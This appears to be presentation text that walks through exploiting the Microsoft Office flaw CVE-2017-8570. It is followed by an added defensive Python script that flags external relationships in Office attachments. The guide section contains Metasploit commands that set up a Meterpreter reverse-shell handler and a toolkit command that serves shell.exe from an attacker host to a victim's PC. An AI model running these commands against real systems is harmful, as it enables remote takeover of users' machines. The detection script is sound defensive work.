• CVE: Common Vulnerabilities and Exposures (CVE-2017-8570)
• CVE-2017-8570 is a remote code execution vulnerability that exists in
Microsoft Office software when it fails to properly handle objects
in memory. An attacker who successfully exploited the
vulnerability could use a specially crafted file to perform actions
in the security context of the current user. For example, the file
could then take actions on behalf of the logged-on user with the
same permissions as the current user. Exploitation of this
vulnerability requires that a user open a specially crafted file with
an affected version of Microsoft Office software.
Guide cont’d: Start Metasploit server
• Notice: This is important! The PostgreSQL service must be
running, because without it the Metasploit Framework cannot
connect to the server.
• service postgresql start
Guide cont’d: Starting the msfconsole
• # msfconsole -x "use multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST 10.0.2.15;
• (In /tmp directory)
Guide cont’d: Start toolkit in exploit mode to deliver local payload
• Will be started on port 80.
# python2.7 cve-2017-8570_toolkit.py -M exp -e http://10.0.2.15/shell.exe -l /tmp/shell.exe
• (In /tmp/CVE directory)
The connection is established.
• Now you can use any Meterpreter command on the victim’s PC.
• In the most recent Microsoft Office security update, Microsoft
has released a patch to prevent this exploit.
• One more thing: I have tried transferring this presentation through
Gmail, and it did not work; in my opinion, Gmail is removing the
executable code from the presentation. Moreover, it is showing
that similar files were used to steal personal information.
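
A mail or file gateway can triage Office attachments like the crafted presentation described above by listing every relationship that points outside the package. This is an added example, not code from the presentation or the toolkit; it assumes the file is an OOXML package (a zip such as .pptx/.ppsx) that references remote content through relationships marked TargetMode="External", and the function names and sample package are constructed for illustration.

```python
import io
import zipfile
import xml.etree.ElementTree as ET  # for untrusted mail at scale, defusedxml is the safer parser

PKG = "{http://schemas.openxmlformats.org/package/2006/relationships}"
DOC = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"

def external_targets(package_bytes):
    """Return sorted (rels part, relationship kind, target) for each External relationship."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(package_bytes)) as pkg:
        for name in pkg.namelist():
            if not name.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(pkg.read(name))
            except ET.ParseError:
                findings.append((name, "unparseable", ""))
                continue
            for rel in root.iter(PKG + "Relationship"):
                if rel.get("TargetMode", "").lower() == "external":
                    kind = rel.get("Type", "").rsplit("/", 1)[-1]
                    findings.append((name, kind, rel.get("Target", "")))
    return sorted(findings)

def is_suspicious(finding):
    """Only plain web/mail hyperlinks pass; any other external relationship is flagged."""
    _, kind, target = finding
    scheme = target.split(":", 1)[0].lower()
    return kind != "hyperlink" or scheme not in ("http", "https", "mailto")

def build_sample():
    """Constructed package: a hyperlink, an external OLE object, an internal layout link."""
    rel = '<Relationship Id="%s" Type="' + DOC + '%s" Target="%s"%s/>'
    ext = ' TargetMode="External"'
    rels = ('<Relationships xmlns="' + PKG.strip("{}") + '">'
            + rel % ("rId1", "hyperlink", "https://example.com/", ext)
            + rel % ("rId2", "oleObject", "http://192.0.2.10/placeholder", ext)
            + rel % ("rId3", "slideLayout", "../slideLayouts/slideLayout1.xml", "")
            + "</Relationships>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("ppt/slides/_rels/slide1.xml.rels", rels)
    return buf.getvalue()

if __name__ == "__main__":
    for f in external_targets(build_sample()):
        print("REVIEW" if is_suspicious(f) else "ok    ", *f)
```

An attachment with any flagged relationship is a candidate for quarantine or sandboxing before it reaches a user who might open it in an unpatched Office installation.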